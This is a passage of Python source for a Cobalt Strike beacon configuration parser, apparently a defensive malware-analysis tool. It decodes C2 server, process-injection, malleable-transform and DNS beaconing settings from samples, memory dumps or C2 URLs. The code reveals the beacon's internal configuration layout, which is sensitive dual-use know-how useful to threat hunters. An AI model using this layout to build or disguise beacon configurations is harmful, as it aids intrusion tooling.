append_length_offset+4])[0] 213 | append = conf_data[append_length_offset+4 : append_length_offset+4+append_length] 214 | ret_arr.append(prepend) 215 | ret_arr.append(append if append_length < 256 and append != bytes(append_length) else 'Empty') 216 | return ret_arr 217 | 218 | if self.is_malleable_stream: 219 | prog = [] 220 | fh = io.BytesIO(conf_data) 221 | while True: 222 | op = read_dword_be(fh) 223 | if not op: 224 | break 225 | if op == 1: 226 | l = read_dword_be(fh) 227 | prog.append("Remove %d bytes from the end" % l) 228 | elif op == 2: 229 | l = read_dword_be(fh) 230 | prog.append("Remove %d bytes from the beginning" % l) 231 | elif op == 3: 232 | prog.append("Base64 decode") 233 | elif op == 8: 234 | prog.append("NetBIOS decode 'a'") 235 | elif op == 11: 236 | prog.append("NetBIOS decode 'A'") 237 | elif op == 13: 238 | prog.append("Base64 URL-safe decode") 239 | elif op == 15: 240 | prog.append("XOR mask w/ random key") 241 | 242 | conf_data = prog 243 | if self.hashBlob: 244 | conf_data = hashlib.md5(conf_data).hexdigest() 245 | 246 | return conf_data 247 | 248 | if self.is_headers: 249 | return self.parse_transformdata(conf_data) 250 | 251 | conf_data = conf_data.strip(b'\x00').decode('latin-1') 252 | return conf_data 253 | 254 | 255 | class BeaconSettings: 256 | 257 | BEACON_TYPE = {0x0: "HTTP", 0x1: "Hybrid HTTP DNS", 0x2: "SMB", 0x4: "TCP", 0x8: "HTTPS", 0x10: "Bind TCP"} 258 | ACCESS_TYPE = {0x0: "Use proxy server (manual)", 0x1: "Use direct connection", 0x2: "Use IE settings", 0x4: "Use proxy server (credentials)"} 259 | EXECUTE_TYPE = {0x1: "CreateThread", 0x2: "SetThreadContext", 0x3: "CreateRemoteThread", 0x4: "RtlCreateUserThread", 0x5: "NtQueueApcThread", 0x6: None, 0x7: None, 0x8: "NtQueueApcThread-s"} 260 | ALLOCATION_FUNCTIONS = {0: "VirtualAllocEx", 1: "NtMapViewOfSection"} 261 | TSTEPS = {1: "append", 2: "prepend", 3: "base64", 4: "print", 5: "parameter", 6: "header", 7: "build", 8: "netbios", 9: "const_parameter", 10: "const_header", 11: "netbiosu", 12: "uri_append", 13: "base64url", 14: "strrep", 15: "mask", 16: "const_host_header"} 262 | ROTATE_STRATEGY = ["round-robin", "random", "failover", "failover-5x", "failover-50x", "failover-100x", "failover-1m", "failover-5m", "failover-15m", "failover-30m", "failover-1h", "failover-3h", "failover-6h", "failover-12h", "failover-1d", "rotate-1m", "rotate-5m", "rotate-15m", "rotate-30m", "rotate-1h", "rotate-3h", "rotate-6h", "rotate-12h", "rotate-1d" ] 263 | 264 | def __init__(self, version): 265 | if version not in SUPPORTED_VERSIONS: 266 | _cli_print("Error: Only supports version 3 and 4, not %d" % version) 267 | return 268 | self.version = version 269 | self.settings = OrderedDict() 270 | self.init() 271 | 272 | def init(self): 273 | self.settings['BeaconType'] = packedSetting(1, confConsts.TYPE_SHORT, mask=self.BEACON_TYPE) 274 | self.settings['Port'] = packedSetting(2, confConsts.TYPE_SHORT) 275 | self.settings['SleepTime'] = packedSetting(3, confConsts.TYPE_INT) 276 | self.settings['MaxGetSize'] = packedSetting(4, confConsts.TYPE_INT) 277 | self.settings['Jitter'] = packedSetting(5, confConsts.TYPE_SHORT) 278 | self.settings['MaxDNS'] = packedSetting(6, confConsts.TYPE_SHORT) 279 | # Silenced config 280 | self.settings['PublicKey'] = packedSetting(7, confConsts.TYPE_STR, 256, isBlob=True) 281 | self.settings['PublicKey_MD5'] = packedSetting(7, confConsts.TYPE_STR, 256, isBlob=True, hashBlob=True) 282 | self.settings['C2Server'] = packedSetting(8, confConsts.TYPE_STR, 256) 283 | self.settings['UserAgent'] = packedSetting(9, confConsts.TYPE_STR, 128) 284 | # TODO: Concat with C2Server? 285 | self.settings['HttpPostUri'] = packedSetting(10, confConsts.TYPE_STR, 64) 286 | 287 | # This is how the server transforms its communication to the beacon 288 | # ref: https://www.cobaltstrike.com/help-malleable-c2 | https://usualsuspect.re/article/cobalt-strikes-malleable-c2-under-the-hood 289 | # TODO: Switch to isHeaders parser logic 290 | self.settings['Malleable_C2_Instructions'] = packedSetting(11, confConsts.TYPE_STR, 256, isBlob=True,isMalleableStream=True) 291 | # This is the way the beacon transforms its communication to the server 292 | # TODO: Change name to HttpGet_Client and HttpPost_Client 293 | self.settings['HttpGet_Metadata'] = packedSetting(12, confConsts.TYPE_STR, 256, isHeaders=True) 294 | self.settings['HttpPost_Metadata'] = packedSetting(13, confConsts.TYPE_STR, 256, isHeaders=True) 295 | 296 | self.settings['SpawnTo'] = packedSetting(14, confConsts.TYPE_STR, 16, isBlob=True) 297 | self.settings['PipeName'] = packedSetting(15, confConsts.TYPE_STR, 128) 298 | # Options 16-18 are deprecated in 3.4 299 | self.settings['DNS_Idle'] = packedSetting(19, confConsts.TYPE_INT, isIpAddress=True) 300 | self.settings['DNS_Sleep'] = packedSetting(20, confConsts.TYPE_INT) 301 | # Options 21-25 are for SSHAgent 302 | self.settings['SSH_Host'] = packedSetting(21, confConsts.TYPE_STR, 256) 303 | self.settings['SSH_Port'] = packedSetting(22, confConsts.TYPE_SHORT) 304 | self.settings['SSH_Username'] = packedSetting(23, confConsts.TYPE_STR, 128) 305 | self.settings['SSH_Password_Plaintext'] = packedSetting(24, confConsts.TYPE_STR, 128) 306 | self.settings['SSH_Password_Pubkey'] = packedSetting(25, confConsts.TYPE_STR, 6144) 307 | self.settings['SSH_Banner'] = packedSetting(54, confConsts.TYPE_STR, 128) 308 | 309 | self.settings['HttpGet_Verb'] = packedSetting(26, confConsts.TYPE_STR, 16) 310 | self.settings['HttpPost_Verb'] = packedSetting(27, confConsts.TYPE_STR, 16) 311 | self.settings['HttpPostChunk'] = packedSetting(28, confConsts.TYPE_INT) 312 | self.settings['Spawnto_x86'] = packedSetting(29, confConsts.TYPE_STR, 64) 313 | self.settings['Spawnto_x64'] = packedSetting(30, confConsts.TYPE_STR, 64) 314 | # Whether the beacon encrypts his communication, should be always on (1) in beacon 4 315 | self.settings['CryptoScheme'] = packedSetting(31, confConsts.TYPE_SHORT) 316 | self.settings['Proxy_Config'] = packedSetting(32, confConsts.TYPE_STR, 128) 317 | self.settings['Proxy_User'] = packedSetting(33, confConsts.TYPE_STR, 64) 318 | self.settings['Proxy_Password'] = packedSetting(34, confConsts.TYPE_STR, 64) 319 | self.settings['Proxy_Behavior'] = packedSetting(35, confConsts.TYPE_SHORT, enum=self.ACCESS_TYPE) 320 | # Option 36 is deprecated in beacon < 4.5 321 | self.settings['Watermark_Hash'] = packedSetting(36, confConsts.TYPE_STR, 32) 322 | self.settings['Watermark'] = packedSetting(37, confConsts.TYPE_INT) 323 | self.settings['bStageCleanup'] = packedSetting(38, confConsts.TYPE_SHORT, isBool=True) 324 | self.settings['bCFGCaution'] = packedSetting(39, confConsts.TYPE_SHORT, isBool=True) 325 | self.settings['KillDate'] = packedSetting(40, confConsts.TYPE_INT, isDate=True) 326 | # Inner parameter, does not seem interesting so silencing 327 | #self.settings['textSectionEnd (0 if !sleep_mask)'] = packedSetting(41, confConsts.TYPE_INT) 328 | 329 | #TODO: dynamic size parsing 330 | #self.settings['ObfuscateSectionsInfo'] = packedSetting(42, confConsts.TYPE_STR, %d, isBlob=True) 331 | self.settings['bProcInject_StartRWX'] = packedSetting(43, confConsts.TYPE_SHORT, isBool=True, boolFalseValue=4) 332 | self.settings['bProcInject_UseRWX'] = packedSetting(44, confConsts.TYPE_SHORT, isBool=True, boolFalseValue=32) 333 | self.settings['bProcInject_MinAllocSize'] = packedSetting(45, confConsts.TYPE_INT) 334 | self.settings['ProcInject_PrependAppend_x86'] = packedSetting(46, confConsts.TYPE_STR, 256, isBlob=True, isProcInjectTransform=True) 335 | self.settings['ProcInject_PrependAppend_x64'] = packedSetting(47, confConsts.TYPE_STR, 256, isBlob=True, isProcInjectTransform=True) 336 | self.settings['ProcInject_Execute'] = packedSetting(51, confConsts.TYPE_STR, 128, isBlob=True, enum=self.EXECUTE_TYPE) 337 | # If True then allocation is using NtMapViewOfSection 338 | self.settings['ProcInject_AllocationMethod'] = packedSetting(52, confConsts.TYPE_SHORT, enum=self.ALLOCATION_FUNCTIONS) 339 | 340 | # Unknown data, silenced for now 341 | self.settings['ProcInject_Stub'] = packedSetting(53, confConsts.TYPE_STR, 16, isBlob=True) 342 | self.settings['bUsesCookies'] = packedSetting(50, confConsts.TYPE_SHORT, isBool=True) 343 | self.settings['HostHeader'] = packedSetting(54, confConsts.TYPE_STR, 128) 344 | 345 | # Silenced as I've yet to test it on a sample with those options 346 | self.settings['smbFrameHeader'] = packedSetting(57, confConsts.TYPE_STR, 128, isBlob=True) 347 | self.settings['tcpFrameHeader'] = packedSetting(58, confConsts.TYPE_STR, 128, isBlob=True) 348 | self.settings['headersToRemove'] = packedSetting(59, confConsts.TYPE_STR, 64) 349 | 350 | # DNS Beacon 351 | self.settings['DNS_Beaconing'] = packedSetting(60, confConsts.TYPE_STR, 33) 352 | self.settings['DNS_get_TypeA'] = packedSetting(61, confConsts.TYPE_STR, 33) 353 | self.settings['DNS_get_TypeAAAA'] = packedSetting(62, confConsts.TYPE_STR, 33) 354 | self.settings['DNS_get_TypeTXT'] = packedSetting(63, confConsts.TYPE_STR, 33) 355 | self.settings['DNS_put_metadata'] = packedSetting(64, confConsts.TYPE_STR, 33) 356 | self.settings['DNS_put_output'] = packedSetting(65, confConsts.TYPE_STR, 33) 357 | self.settings['DNS_resolver'] = packedSetting(66, confConsts.TYPE_STR, 15) 358 | self.settings['DNS_strategy'] = packedSetting(67, confConsts.TYPE_SHORT, enum=self.ROTATE_STRATEGY) 359 | self.settings['DNS_strategy_rotate_seconds'] = packedSetting(68, confConsts.TYPE_INT) 360 | self.settings['DNS_strategy_fail_x'] = packedSetting(69, confConsts.TYPE_INT) 361 | self.settings['DNS_strategy_fail_seconds'] = packedSetting(70, confConsts.TYPE_INT) 362 | 363 | # Retry settings (CS 4.5+ only) 364 | self.settings['Retry_Max_Attempts'] = packedSetting(71, confConsts.TYPE_INT) 365 | self.settings['Retry_Increase_Attempts'] = packedSetting(72, confConsts.TYPE_INT) 366 | self.settings['Retry_Duration'] = packedSetting(73, confConsts.TYPE_INT) 367 | 368 | 369 | class cobaltstrikeConfig: 370 | def __init__(self, f): 371 | ''' 372 | f: file path or file-like object 373 | ''' 374 | self.data = None 375 | if isinstance(f, str): 376 | with open(f, 'rb') as fobj: 377 | self.data = fobj.read() 378 | else: 379 | self.data = f.read() 380 | 381 | """Parse the CobaltStrike configuration""" 382 | 383 | @staticmethod 384 | def decode_config(cfg_blob, version): 385 | return bytes([cfg_offset ^ confConsts.XORBYTES[version] for cfg_offset in cfg_blob]) 386 | 387 | def _parse_config(self, version, quiet=False, as_json=False): 388 | ''' 389 | Parses beacon's configuration from beacon PE or memory dump. 390 | Returns json of config is found; else it returns None. 391 | 392 | :int version: Try a specific version (3 or 4), or leave None to try both of them 393 | :bool quiet: Whether to print missing or empty settings 394 | :bool as_json: Whether to dump as json 395 | ''' 396 | re_start_match = re.search(confConsts.START_PATTERNS[version], self.data) 397 | re_start_decoded_match = re.search(confConsts.START_PATTERN_DECODED, self.data) 398 | 399 | if not re_start_match and not re_start_decoded_match: 400 | return None 401 | encoded_config_offset = re_start_match.start() if re_start_match else -1 402 | decoded_config_offset = re_start_decoded_match.start() if re_start_decoded_match else -1 403 | 404 | if encoded_config_offset >= 0: 405 | full_config_data = cobaltstrikeConfig.decode_config(self.data[encoded_config_offset : encoded_config_offset + confConsts.CONFIG_SIZE], version=version) 406 | else: 407 | full_config_data = self.data[decoded_config_offset : decoded_config_offset + confConsts.CONFIG_SIZE] 408 | 409 | parsed_config = {} 410 | settings = BeaconSettings(version).settings.items() 411 | for conf_name, packed_conf in settings: 412 | parsed_setting = packed_conf.pretty_repr(full_config_data) 413 | 414 | parsed_config[conf_name] = parsed_setting 415 | if as_json: 416 | continue 417 | 418 | if conf_name in SILENT_CONFIGS: 419 | continue 420 | 421 | if parsed_setting == 'Not Found' and quiet: 422 | continue 423 | 424 | conf_type = type(parsed_setting) 425 | if conf_type in (str, int, bytes): 426 | if quiet and conf_type == str and parsed_setting.strip() == '': 427 | continue 428 | _cli_print("{: <{width}} - {val}".format(conf_name, width=COLUMN_WIDTH-3, val=parsed_setting)) 429 | 430 | elif parsed_setting == []: 431 | if quiet: 432 | continue 433 | _cli_print("{: <{width}} - {val}".format(conf_name, width=COLUMN_WIDTH-3, val='Empty')) 434 | 435 | elif conf_type == dict: # the beautifulest code 436 | conf_data = [] 437 | for k in parsed_setting.keys(): 438 | if parsed_setting[k]: 439 | conf_data.append(k) 440 | for v in parsed_setting[k]: 441 | conf_data.append('\t' + v) 442 | if not conf_data: 443 | continue 444 | _cli_print("{: <{width}} - {val}".format(conf_name, width=COLUMN_WIDTH-3, val=conf_data[0])) 445 | for val in conf_data[1:]: 446 | _cli_print(' ' * COLUMN_WIDTH, end='') 447 | _cli_print(val) 448 | 449 | elif conf_type == list: # list 450 | _cli_print("{: <{width}} - {val}".format(conf_name, width=COLUMN_WIDTH-3, val=parsed_setting[0])) 451 | for val in parsed_setting[1:]: 452 | _cli_print(' ' * COLUMN_WIDTH, end='') 453 | _cli_print(val) 454 | 455 | if as_json: 456 | _cli_print(json.dumps(parsed_config, cls=Base64Encoder)) 457 | 458 | return parsed_config 459 | 460 | def parse_config(self, version=None, quiet=False, as_json=False): 461 | ''' 462 | Parses beacon's configuration from beacon PE or memory dump 463 | Returns json of config is found; else it returns None. 464 | 465 | :int version: Try a specific version (3 or 4), or leave None to try both of them 466 | :bool quiet: Whether to print missing or empty settings 467 | :bool as_json: Whether to dump as json 468 | ''' 469 | 470 | if not version: 471 | for ver in SUPPORTED_VERSIONS: 472 | parsed = self._parse_config(version=ver, quiet=quiet, as_json=as_json) 473 | if parsed: 474 | return parsed 475 | else: 476 | return self._parse_config(version=version, quiet=quiet, as_json=as_json) 477 | return None 478 | 479 | 480 | def parse_encrypted_config_non_pe(self, version=None, quiet=False, as_json=False): 481 | self.data = decrypt_beacon(self.data) 482 | return self.parse_config(version=version, quiet=quiet, as_json=as_json) 483 | 484 | def parse_encrypted_config(self, version=None, quiet=False, as_json=False): 485 | ''' 486 | Parses beacon's configuration from stager dll or memory dump 487 | Returns json of config is found; else it returns None. 488 | 489 | :bool quiet: Whether to print missing settings 490 | :bool as_json: Whether to dump as json 491 | ''' 492 | 493 | try: 494 | pe = pefile.PE(data=self.data) 495 | except pefile.PEFormatError: 496 | return self.parse_encrypted_config_non_pe(version=version, quiet=quiet, as_json=as_json) 497 | 498 | data_sections = [s for s in pe.sections if s.Name.find(b'.data') != -1] 499 | if not data_sections: 500 | _cli_print("Failed to find .data section") 501 | return False 502 | data = data_sections[0].get_data() 503 | 504 | offset = 0 505 | key_found = False 506 | while offset < len(data): 507 | key = data[offset:offset+4] 508 | if key != bytes(4): 509 | if data.count(key) >= THRESHOLD: 510 | key_found = True 511 | size = int.from_bytes(data[offset-4:offset], 'little') 512 | encrypted_data_offset = offset+16 - (offset % 16) 513 | break 514 | 515 | offset += 4 516 | 517 | if not key_found: 518 | return False 519 | 520 | # decrypt 521 | enc_data = data[encrypted_data_offset:encrypted_data_offset+size] 522 | dec_data = [] 523 | for i,c in enumerate(enc_data): 524 | dec_data.append(c ^ key[i % 4]) 525 | 526 | dec_data = bytes(dec_data) 527 | self.data = dec_data 528 | return self.parse_config(version=version, quiet=quiet, as_json=as_json) 529 | 530 | 531 | def csBeaconParse(beacon,json,quiet,csVersion): 532 | # parser = argparse.ArgumentParser(description="Parses CobaltStrike Beacon's configuration from PE, memory dump or URL.") 533 | # parser.add_argument("beacon", help="This can be a file path or a url (if started with http/s)") 534 | # parser.add_argument("--json", help="Print as json", action="store_true", default=False) 535 | # parser.add_argument("--quiet", help="Do not print missing or empty settings", action="store_true", default=False) 536 | # parser.add_argument("--version", help="Try as specific cobalt version (3 or 4). If not specified, tries both.", type=int) 537 | # args = parser.parse_args() 538 | 539 | if os.path.isfile(beacon): 540 | result= cobaltstrikeConfig(beacon).parse_config(version=csVersion, quiet=quiet, as_json=json) or \ 541 | cobaltstrikeConfig(beacon).parse_encrypted_config(version=csVersion, quiet=quiet, as_json=json) 542 | if result : 543 | return result 544 | elif beacon.lower().startswith('http'): 545 | x86_beacon_data = get_beacon_data(beacon, 'x86') 546 | x64_beacon_data = get_beacon_data(beacon, 'x64') 547 | if not x86_beacon_data and not x64_beacon_data: 548 | print("[-] Failed to find any beacon configuration") 549 | exit(1) 550 | 551 | conf_data = x86_beacon_data or x64_beacon_data 552 | result = cobaltstrikeConfig(BytesIO(conf_data)).parse_config(version=csVersion, quiet=quiet, as_json=json) or \ 553 | cobaltstrikeConfig(BytesIO(conf_data)).parse_encrypted_config(version=csVersion, quiet=quiet, as_json=json) 554 | if result : 555 | return result 556 | else: 557 | print("[-] Target path is not an existing file or a C2 URL") 558 | exit(1) 559 | 560 | print("[-] Failed to find any beacon configuration") 561 | exit(1) 562 | --------------------------------------------------------------------------------